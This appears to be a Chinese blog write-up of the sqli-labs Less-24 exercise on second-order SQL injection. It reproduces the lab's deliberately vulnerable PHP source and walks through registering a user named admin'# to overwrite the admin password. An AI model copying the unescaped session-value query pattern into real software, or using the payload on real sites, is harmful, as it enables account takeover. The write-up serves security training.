sqli-lab-less24
一、靶标地址
Less-24 POST-Second Oder Injections *Real treat*-Stored Injections
Second Degree Injections
#二次注入 POST 注入
http://127.0.0.1/sqli/less-24/
二、漏洞探测
#新类型的登录框
#存在注册点和
三、源码分析
#index.php
<?PHP
session_start();#开始一个新的session生命周期。
if (isset($_SESSION['username']) && isset($_COOKIE['Auth'])) {
#给$username赋值为Session中的username
header('Location: logged-in.php');#重定位logged-in.php
}
?>
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<title>Less-24 - Second Degree Injections </title>
</head>
<body bgcolor="#000000">
<div style="text-align:center">
<form name="login" method="POST" action="login.php">
#转入login.php
<h2 style="text-align:center;background-image:url('../images/Less-24.jpg');background-repeat:no-repeat;background-position:center center">
<div style="padding-top:300px;text-align:center;color:#FFFF00;"><?php echo $form_title_in; ?></div>
</h2>
<div align="center">
<table style="margin-top:50px;">
<tr>
<td style="text-align:right">
<font size="3" color="#FFFF00">
<strong>Username:</strong>
</td>
<td style="text-align:left">
<input name="login_user" id="login_user" type="text" value="" />
</td>
</tr>
<tr>
<td style="text-align:right">
<font size="3" color="#FFFF00">
<strong>Password:</strong>
</td>
<td style="text-align:left">
<input name="login_password" id="login_password" type="password" value="" />
</td>
</tr>
<tr>
<td colspan="2" style="text-align:right">
<input name="mysubmit" id="mysubmit" type="submit" value="Login" /><br/><br/>
<a style="font-size:.8em;color:#FFFF00" href="forgot_password.php">Forgot your password?</a><font size="3" color="#FFFF00">
||</font>
<a style="font-size:.8em;color:#FFFF00" href="new_user.php">New User click here?</a>
</td>
</tr>
</table>
</div>
</form>
</div>
</body>
</html>
#logged-in.php
<?PHP
session_start();
if (!isset($_COOKIE["Auth"]))
{
if (!isset($_SESSION["username"]))
{
header('Location: index.php');
}
header('Location: index.php');
}
?>
<html>
<head>
<title>
</title>
</head>
<body bgcolor="#000000">
<div align="right">
<a style="font-size:.8em;color:#FFFF00" href='index.php'><img src="../images/Home.png" height='45'; width='45'></br>HOME</a></br></br></br>
</div>
<center>
<img src="../images/Logged-in.jpg"></br><font size="4" color="#FFFF00"></br></br>
YOU ARE LOGGED IN AS </br>
<font size="7" color="#FFFF00"><strong>
<?php
echo $_SESSION["username"];#打印username
?>
</strong>
</br>
</br>
<font size="5" color="#FFFF00">
You can Change your password here.
<form name="mylogin" method="POST" action="pass_change.php">
#提交后转入pass_change.php
<table style="margin-top:50px;">
<tr>
<td style="text-align:right">
<font size="3" color="#FFFF00">
<strong>Current Password:</strong></font>
</td>
<td style="text-align:left">
<input name="current_password" id="current_password" type="text" value="" />
</td>
</tr>
<tr>
<td style="text-align:right">
<font size="3" color="#FFFF00">
<strong>New Password:</strong>
</font>
</td>
<td style="text-align:left">
<input name="password" id="password" type="password" value="" />
</td>
</tr>
<tr>
<td style="text-align:right">
<font size="3" color="#FFFF00">
<strong>Retype Password:</strong>
</font>
</td>
<td style="text-align:left">
<input name="re_password" id="re_password" type="password" value="" />
</td>
</tr>
<tr>
<td colspan="2" style="text-align:right">
<input name="submit" id="submit" type="submit" value="Reset" />
#重新设置password
</td>
</tr>
<tr>
<td colspan="2" style="text-align:right">
<input name="submit1" id="submit1" type="submit" value="Logout" /><br/><br/>
#登出
</td>
</tr>
</table>
</center>
</body>
</html>
#pass_change.php
<html>
<head>
</head>
<body bgcolor="#000000">
<?PHP
session_start();
if (!isset($_COOKIE["Auth"]))
{
if (!isset($_SESSION["username"]))
{
header('Location: index.php');
}
header('Location: index.php');
}
?>
<div align="right">
<a style="font-size:.8em;color:#FFFF00" href='index.php'><img src="../images/Home.png" height='45'; width='45'></br>HOME</a>
</div>
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
if (isset($_POST['submit']))
{
# Validating the user input........
$username= $_SESSION["username"];
$curr_pass= mysql_real_escape_string($_POST['current_password']);
$pass= mysql_real_escape_string($_POST['password']);
$re_pass= mysql_real_escape_string($_POST['re_password']);
#mysql_real_escape_string转义SQL语句中使用的字符串中的特殊字符
if($pass==$re_pass)
{
$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
$res = mysql_query($sql) or die('You tried to be smart, Try harder!!!! :( ');
$row = mysql_affected_rows();
#mysql_affected_rows()函数返回前一次 MySQL 操作所影响的记录行数。
echo '<font size="3" color="#FFFF00">';
echo '<center>';
if($row==1)
{
echo "Password successfully updated";
}
else
{
header('Location: failed.php');
//echo 'You tried to be smart, Try harder!!!! :( ';
}
}
else
{
echo '<font size="5" color="#FFFF00"><center>';
echo "Make sure New Password and Retype Password fields have same value";
header('refresh:2, url=index.php');
}
}
?>
<?php
if(isset($_POST['submit1']))
{
session_destroy();#注销session
setcookie('Auth', 1 , time()-3600);
header ('Location: index.php');#重定向index.php
}
?>
</center>
</body>
</html>
#login.php
<html>
<head>
</head>
<body bgcolor="#000000">
<font size="3" color="#FFFF00">
<div align="right">
<a style="font-size:.8em;color:#FFFF00" href='index.php'><img src="../images/Home.png" height='45'; width='45'></br>HOME</a>
</div>
<?PHP
session_start();
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
function sqllogin(){
$username = mysql_real_escape_string($_POST["login_user"]);
$password = mysql_real_escape_string($_POST["login_password"]);
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
//$sql = "SELECT COUNT(*) FROM users WHERE username='$username' and password='$password'";
$res = mysql_query($sql) or die('You tried to be real smart, Try harder!!!! :( ');
$row = mysql_fetch_row($res);
//print_r($row) ;
if ($row[1]) {
return $row[1];
} else {
return 0;
}
}
$login = sqllogin();
if (!$login== 0)
{
$_SESSION["username"] = $login;#设置了$_SESSION["username"]
setcookie("Auth", 1, time()+3600); /* expire in 15 Minutes */
header('Location: logged-in.php');#重定向的logged-in
}
else
{
?>
<tr><td colspan="2" style="text-align:center;"><br/><p style="color:#FF0000;">
<center>
<img src="../images/slap1.jpg">
</center>
</p></td></tr>
<?PHP
}
?>
</body>
</html>
#failed.php
<?PHP
session_start();
if (!isset($_COOKIE["Auth"]))
{
if (!isset($_SESSION["username"]))
{
header('Location: index.php');
}
header('Location: index.php');
}
?>
<html>
<head>
</head>
<body bgcolor="#000000">
<div align="right">
<a style="font-size:.8em;color:#FFFF00" href='index.php'><img src="../images/Home.png" height='45'; width='45'></br>HOME</a>
</div>
</div>
<div style=" margin-top:150px;color:#FFF; font-size:24px; text-align:center">
<center>
<img src="../images/slap1.jpg">
</center>
</div>
</body>
</html>
#new_user.php
<?php
include '../sql-connections/sql-connect.php' ;
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<title><?php echo $feedback_title_ns; ?> </title>
</head>
<body bgcolor="#000000">
<div align="right">
<a style="font-size:.8em;color:#FFFF00" href='index.php'><img src="../images/Home.png" height='45'; width='45'></br>HOME</a>
</div>
<font size="3" color="#FFFF00">
<div style="text-align:center">
<form name="mylogin" method="POST" action="login_create.php">#提交给login_create.php
<h2 style="text-align:center;background-image:url('../images/Less-24-new-user.jpg');background-repeat:no-repeat;background-position:center center">
<div style="padding-top:300px;text-align:center;color:#FFFF00;"><?php echo $form_title_ns; ?></div>
</h2>
<div align="center">
<table style="margin-top:50px;">
<tr>
<td style="text-align:right">
<font size="3" color="#FFFF00">
<strong>Desired Username:</strong></font>
</td>
<td style="text-align:left">
<input name="username" id="username" type="text" value="" />
</td>
</tr>
<tr>
<td style="text-align:right">
<font size="3" color="#FFFF00">
<strong>Password:</strong>
</font>
</td>
<td style="text-align:left">
<input name="password" id="password" type="password" value="" />
</td>
</tr>
<tr>
<td style="text-align:right">
<font size="3" color="#FFFF00">
<strong>Retype Password:</strong>
</font>
</td>
<td style="text-align:left">
<input name="re_password" id="re_password" type="password" value="" />
</td>
</tr>
<tr>
<td colspan="2" style="text-align:right">
<input name="submit" id="submit" type="submit" value="Register" /><br/><br/>
</td>
</tr>
</table>
</div>
</form>
</div>
</body>
</html>
#login_create.php
<html>
<head>
</head>
<body bgcolor="#000000">
<?PHP
session_start();
?>
<div align="right">
<a style="font-size:.8em;color:#FFFF00" href='index.php'><img src="../images/Home.png" height='45'; width='45'></br>HOME</a>
</div>
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
if (isset($_POST['submit']))
{
# Validating the user input........
//$username= $_POST['username'] ;
$username= mysql_escape_string($_POST['username']) ;
$pass= mysql_escape_string($_POST['password']);
$re_pass= mysql_escape_string($_POST['re_password']);
echo "<font size='3' color='#FFFF00'>";
$sql = "select count(*) from users where username='$username'";
$res = mysql_query($sql) or die('You tried to be smart, Try harder!!!! :( ');
$row = mysql_fetch_row($res);
//print_r($row);
if (!$row[0]== 0)
{
?>
<script>alert("The username Already exists, Please choose a different username ")</script>;
<?php
header('refresh:1, url=new_user.php');
}
else
{
if ($pass==$re_pass)
{
# Building up the query........
$sql = "insert into users ( username, password) values(\"$username\", \"$pass\")";
mysql_query($sql) or die('Error Creating your user account, : '.mysql_error());
echo "</br>";
echo "<center><img src=../images/Less-24-user-created.jpg><font size='3' color='#FFFF00'>";
//echo "<h1>User Created Successfully</h1>";
echo "</br>";
echo "</br>";
echo "</br>";
echo "</br>Redirecting you to login page in 5 sec................";
echo "<font size='2'>";
echo "</br>If it does not redirect, click the home button on top right</center>";
header('refresh:5, url=index.php');
}
else
{
?>
<script>alert('Please make sure that password field and retype password match correctly')</script>
<?php
header('refresh:1, url=new_user.php');
}
}
}
?>
</body>
</html>
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Xa7IDkwM-1692015257782)(./assets/less-24.png)]
涉及到的sql语句
#pass_change.php
$username= $_SESSION["username"];
#这里并没有进行转义!!!漏洞地方
$curr_pass= mysql_real_escape_string($_POST['current_password']);
$pass= mysql_real_escape_string($_POST['password']);
$re_pass= mysql_real_escape_string($_POST['re_password']);
#mysql_real_escape_string转义SQL语句中使用的字符串中的特殊字符
if($pass==$re_pass)
{
$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
#login.php
$username = mysql_real_escape_string($_POST["login_user"]);
$password = mysql_real_escape_string($_POST["login_password"]);
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
#login_create.php
$username= mysql_escape_string($_POST['username']) ;
$pass= mysql_escape_string($_POST['password']);
$re_pass= mysql_escape_string($_POST['re_password']);
echo "<font size='3' color='#FFFF00'>";
$sql = "select count(*) from users where username='$username'";
$sql = "insert into users ( username, password) values(\"$username\", \"$pass\")";
login.php、login_create.php、pass_change.php的参数做了转义特殊字符处理
但是pass_change.php中的$username= $_SESSION["username"]并没有做转义
而且这个参数是在login.php中$_SESSION["username"] = $login;
#$login为查询到的用户名
所以思路为创造一个用户admin' --+
然后用这个用户登录,然后修改密码
$sql = "UPDATE users SET PASSWORD='$pass' where username='admin' --+' and password='$curr_pass' ";
四、黑盒与白盒测试
1、创建用户
admin' --+
123456
2、然后用这个用户登录,然后修改密码
3、然后使用admin和新密码再登录
4、失败
1、创建用户
admin'#
123456
2、然后用这个用户登录,然后修改密码
3、然后使用admin和新密码再登录
4、成功
暂无进一步利用方式
五、脚本撰写
无脚本
六、sqlmap
暂无用法
七、总结
1、二次注入新用法
811
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
